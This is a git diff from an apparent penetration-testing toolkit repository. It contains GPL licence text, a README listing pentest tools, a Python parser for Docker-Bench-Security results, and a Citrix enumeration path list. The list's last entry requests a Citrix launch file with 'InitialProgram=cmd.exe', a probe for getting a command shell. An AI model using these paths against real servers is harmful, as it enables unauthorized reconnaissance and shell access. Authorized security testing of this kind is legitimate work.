notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + {one line to give the program's name and a brief idea of what it does.} + Copyright (C) {year} {name of author} + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + {project} Copyright (C) {year} {fullname} + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. diff --git a/README.md b/README.md index bc44d40..0e31dfe 100644 --- a/README.md +++ b/README.md @@ -1,57 +1,57 @@ -## PenTestKit - -*Useful tools & scripts during Penetration Testing Engagements* - -### Requirements - -**OS** - -* Tested on Debian 8.x, 9.x & Kali Linux - -**Languages & Libraries** - -* Python 2.x -* termcolor (python package) -* requests (python package) -* BeautifulSoup (python package) -* shodan (python package) -* python-nmap (python package) - -**Tools** - -* Burp Pro -* Nessus -* Nmap -* Nikto -* sslscan -* dirb -* netdiscover -* curl -* netcat (nc) -* arp-scan -* p0f -* stunnel -* wget -* socat -* whatweb -* sqlmap -* rsmangler -* patator -* host -* nbtscan -* enum4linux -* rpcclient -* onesixtyone -* crunch -* cewl -* pandoc -* more.. - -*** - -### Download - Installation - -```bash -git clone https://github.com/maldevel/PenTestKit.git -cd PenTestKit/ -``` +## PenTestKit + +*Useful tools & scripts during Penetration Testing Engagements* + +### Requirements + +**OS** + +* Tested on Debian 8.x, 9.x & Kali Linux + +**Languages & Libraries** + +* Python 2.x +* termcolor (python package) +* requests (python package) +* BeautifulSoup (python package) +* shodan (python package) +* python-nmap (python package) + +**Tools** + +* Burp Pro +* Nessus +* Nmap +* Nikto +* sslscan +* dirb +* netdiscover +* curl +* netcat (nc) +* arp-scan +* p0f +* stunnel +* wget +* socat +* whatweb +* sqlmap +* rsmangler +* patator +* host +* nbtscan +* enum4linux +* rpcclient +* onesixtyone +* crunch +* cewl +* pandoc +* more.. + +*** + +### Download - Installation + +```bash +git clone https://github.com/maldevel/PenTestKit.git +cd PenTestKit/ +``` diff --git a/auditing/parse-docker-bench-security-json-file.py b/auditing/parse-docker-bench-security-json-file.py index 4234c00..8860622 100644 --- a/auditing/parse-docker-bench-security-json-file.py +++ b/auditing/parse-docker-bench-security-json-file.py @@ -1,200 +1,200 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-1019 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2019 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -####################################################################################################### - -import sys -import argparse -import os -import json - -from argparse import RawTextHelpFormatter - -####################################################################################################### - -message = """ -Parse Docker-Bench-Security Script JSON files | @maldevel -Version: {} -""".format(__version__) - -def MainFunc(): - parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) - - parser.add_argument('-j', '--json', - action='store', - metavar='jsonfile', - dest='jsonfile', - type=str, - default=None, - help='Results json file path.') - - parser.add_argument('-t', '--type', - action='store', - metavar='type', - dest='type', - type=str, - default='all', - help='Result type(info, pass, warn, note, all).') - - parser.add_argument('-f', '--filename', - action='store', - metavar='filename', - dest='filename', - type=str, - default=None, - help='Output filename') - - parser.add_argument('-o', '--output', - action='store', - metavar='directory', - dest='output', - type=str, - default=None, - help='Output directory path') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit(1) - - args = parser.parse_args() - - print (message) - - jsonfile = args.jsonfile - if not os.path.isfile(jsonfile): - print ('[-] Please provide an existing json file.') - sys.exit(1) - - with open(jsonfile, "r") as f: - data = json.load(f) - - filter = args.type.lower() - - filename = args.filename - - if filename: - txtfilename = filename + ".txt" - mdfilename = filename + ".md" - htmlfilename = filename + ".html" - else: - txtfilename = os.path.basename(jsonfile) + ".txt" - mdfilename = os.path.basename(jsonfile) + ".md" - htmlfilename = os.path.basename(jsonfile) + ".html" - - output = args.output - - if output: - txtfile = os.path.join(output, '') + txtfilename - mdfile = os.path.join(output, '') + mdfilename - htmlfile = os.path.join(output, '') + htmlfilename - else: - txtfile = os.path.join(os.path.dirname(jsonfile), '') + txtfilename - mdfile = os.path.join(os.path.dirname(jsonfile), '') + mdfilename - htmlfile = os.path.join(os.path.dirname(jsonfile), '') + htmlfilename - - with open(txtfile, "w") as txt, open(mdfile, "w") as md, open(htmlfile, "w") as html: - print('Docker Bench Security {} Results\n'.format(data['dockerbenchsecurity'])) - txt.write('Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity'])) - txt.write('Checks: {}\n'.format(data['checks'])) - txt.write('Score: {}\n\n'.format(data['score'])) - - md.write('## Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity'])) - md.write('* Checks: {}\n'.format(data['checks'])) - md.write('* Score: {}\n'.format(data['score'])) - md.write('\n') - - html.write('Docker Bench Security {} Results'.format(data['dockerbenchsecurity'])) - html.write('

Docker Bench Security {} Results

'.format(data['dockerbenchsecurity'])) - html.write('
    ') - html.write('
  • Checks: {}
    • '.format(data['checks'])) - html.write('
  • Score: {}
    • '.format(data['score'])) - html.write('
') - - for test in data['tests']: - print('{}\n'.format(test['desc'])) - txt.write('{}\n\n'.format(test['desc'])) - md.write('### {}\n\n'.format(test['desc'])) - html.write('

{}

'.format(test['desc'])) - - html.write('
    ') - for result in test['results']: - - if result['result'] == 'WARN' and (filter == 'warn' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
    • '.format(result['id'], result['desc'])) - - elif result['result'] == 'INFO' and (filter == 'info' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
    • '.format(result['id'], result['desc'])) - - elif result['result'] == 'PASS' and (filter == 'pass' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
    • '.format(result['id'], result['desc'])) - - elif result['result'] == 'NOTE' and (filter == 'note' or filter == 'all'): - print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) - txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) - html.write('
  • [{}] '.format(result['result'])) - html.write('{} {}
    • '.format(result['id'], result['desc'])) - - html.write('
') - - print() - txt.write('\n') - md.write('\n---\n\n') - html.write('
') - - html.write('') - -####################################################################################################### - -if __name__ == '__main__': - try: - MainFunc() - except KeyboardInterrupt: - print ("Interrupted by user..") - except: - sys.exit() - -####################################################################################################### +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-1019 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2019 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +####################################################################################################### + +import sys +import argparse +import os +import json + +from argparse import RawTextHelpFormatter + +####################################################################################################### + +message = """ +Parse Docker-Bench-Security Script JSON files | @maldevel +Version: {} +""".format(__version__) + +def MainFunc(): + parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) + + parser.add_argument('-j', '--json', + action='store', + metavar='jsonfile', + dest='jsonfile', + type=str, + default=None, + help='Results json file path.') + + parser.add_argument('-t', '--type', + action='store', + metavar='type', + dest='type', + type=str, + default='all', + help='Result type(info, pass, warn, note, all).') + + parser.add_argument('-f', '--filename', + action='store', + metavar='filename', + dest='filename', + type=str, + default=None, + help='Output filename') + + parser.add_argument('-o', '--output', + action='store', + metavar='directory', + dest='output', + type=str, + default=None, + help='Output directory path') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + print (message) + + jsonfile = args.jsonfile + if not os.path.isfile(jsonfile): + print ('[-] Please provide an existing json file.') + sys.exit(1) + + with open(jsonfile, "r") as f: + data = json.load(f) + + filter = args.type.lower() + + filename = args.filename + + if filename: + txtfilename = filename + ".txt" + mdfilename = filename + ".md" + htmlfilename = filename + ".html" + else: + txtfilename = os.path.basename(jsonfile) + ".txt" + mdfilename = os.path.basename(jsonfile) + ".md" + htmlfilename = os.path.basename(jsonfile) + ".html" + + output = args.output + + if output: + txtfile = os.path.join(output, '') + txtfilename + mdfile = os.path.join(output, '') + mdfilename + htmlfile = os.path.join(output, '') + htmlfilename + else: + txtfile = os.path.join(os.path.dirname(jsonfile), '') + txtfilename + mdfile = os.path.join(os.path.dirname(jsonfile), '') + mdfilename + htmlfile = os.path.join(os.path.dirname(jsonfile), '') + htmlfilename + + with open(txtfile, "w") as txt, open(mdfile, "w") as md, open(htmlfile, "w") as html: + print('Docker Bench Security {} Results\n'.format(data['dockerbenchsecurity'])) + txt.write('Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity'])) + txt.write('Checks: {}\n'.format(data['checks'])) + txt.write('Score: {}\n\n'.format(data['score'])) + + md.write('## Docker Bench Security {} Results\n\n'.format(data['dockerbenchsecurity'])) + md.write('* Checks: {}\n'.format(data['checks'])) + md.write('* Score: {}\n'.format(data['score'])) + md.write('\n') + + html.write('Docker Bench Security {} Results'.format(data['dockerbenchsecurity'])) + html.write('

Docker Bench Security {} Results

'.format(data['dockerbenchsecurity'])) + html.write('
    ') + html.write('
  • Checks: {}
    • '.format(data['checks'])) + html.write('
  • Score: {}
    • '.format(data['score'])) + html.write('
') + + for test in data['tests']: + print('{}\n'.format(test['desc'])) + txt.write('{}\n\n'.format(test['desc'])) + md.write('### {}\n\n'.format(test['desc'])) + html.write('

{}

'.format(test['desc'])) + + html.write('
    ') + for result in test['results']: + + if result['result'] == 'WARN' and (filter == 'warn' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
    • '.format(result['id'], result['desc'])) + + elif result['result'] == 'INFO' and (filter == 'info' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
    • '.format(result['id'], result['desc'])) + + elif result['result'] == 'PASS' and (filter == 'pass' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
    • '.format(result['id'], result['desc'])) + + elif result['result'] == 'NOTE' and (filter == 'note' or filter == 'all'): + print('[{}] {} {}'.format(result['result'], result['id'], result['desc'])) + txt.write('[{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + md.write('* [{}] {} {}\n'.format(result['result'], result['id'], result['desc'])) + html.write('
  • [{}] '.format(result['result'])) + html.write('{} {}
    • '.format(result['id'], result['desc'])) + + html.write('
') + + print() + txt.write('\n') + md.write('\n---\n\n') + html.write('
') + + html.write('') + +####################################################################################################### + +if __name__ == '__main__': + try: + MainFunc() + except KeyboardInterrupt: + print ("Interrupted by user..") + except: + sys.exit() + +####################################################################################################### diff --git a/enumeration/citrix.list b/enumeration/citrix.list index f97f21a..18ec28d 100644 --- a/enumeration/citrix.list +++ b/enumeration/citrix.list @@ -1,65 +1,65 @@ -/Citrix/ -/Citrix/AccessPlatform/auth/ -/Citrix/AccessPlatform/media -/Citrix/AccessPlatform/auth/login.aspx -/Citrix/AccessPlatform/site/applist.aspx -/LogonAgent/Login.asp -/Citrix/NFuse16/ -/Citrix/NFuse151/ -/Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On -/Citrix/AccessPlatform/site/eswi.aspx -/Citrix/AccessPlatform/html/dummy -/Citrix/AccessPlatform/site/default.aspx -/Citrix/AccessPlatform/site/launcher.aspx -/Citrix/AccessPlatform/site/launch.ica -/CitrixAuthService/AuthService.asmx -/Citrix/AccessPlatform/App_Web_default.aspx -/Citrix/AccessPlatform/App_global.asax -/citrix/pnagent/conf -/Citrix/AccessPlatform/webinterface.conf -/Citrix/AccessPlatform/auth/agesso.aspx -/Citrix/AccessPlatform/site/default.aspx -/Citrix/AccessPlatform/site/applist.aspx -/Citrix/NFuse161/login.asp -/CITRIX/NFUSE/default/login.asp -/Citrix/AccessPlatform/site/wiac.aspx -/Citrix/NFuse151/ -/Citrix/AccessPlatform/site/appembed.aspx?NFuse_Application=Citrix.MPS.App.HYDRO -/Citrix/AccessPlatform/app_data/auth/include/layout.ascx -/Citrix/AccessPlatform/app_data/auth/include/style.inc -/Citrix/AccessPlatform/site/logout.aspx -/Citrix/AccessPlatform/site/clients.htm -/Citrix/Xenapp/ -/Citrix/XenApp/auth/login.aspx -/Citrix/PNAgent/config.xml -/citrix/metaframeexp/default/login.asp?ClientDetection=On -/citrix/metaframeexp/default/login.asp -/citrix/Nfuse17/ -/CITRIX/NFUSE/default/login.asp -/Citrix/NFuse161/login.asp -/citrix/MetaFrame/default/default.aspx -/Citrix/AccessPlatform/ -/Citrix/AccessPlatform/site/launch.ica?InitialProgram=cmd.exe 